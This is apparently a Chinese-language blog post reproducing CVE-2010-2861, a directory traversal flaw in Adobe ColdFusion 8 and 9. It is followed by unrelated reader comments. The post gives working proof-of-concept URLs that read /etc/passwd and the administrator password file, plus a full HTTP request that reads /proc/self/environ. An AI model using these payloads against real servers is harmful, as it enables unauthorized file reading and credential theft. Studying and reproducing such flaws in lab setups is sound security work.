CVE-2010-2861
漏洞描述:Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
影响版本:Adobe ColdFusion 8、9版本
参考资料:
https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2010-2861/README.zh-cn.md
POC:
http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
读取后台管理员密码
http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
漏洞复现
GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../proc/self/environ%00en HTTP/1.1
Host: 123.58.224.8:33983
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en;q=0.7,en-US;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CFID=2; CFTOKEN=93764139
Upgrade-Insecure-Requests: 1
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
cesfe 22天前0
好的,谢谢昶之琴 24天前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 25天前0
帆软部署 ,访问的地址访问不到昶之琴 2年前0
我以为只要提交就行了好想告诉你 2年前0
花巨资看一下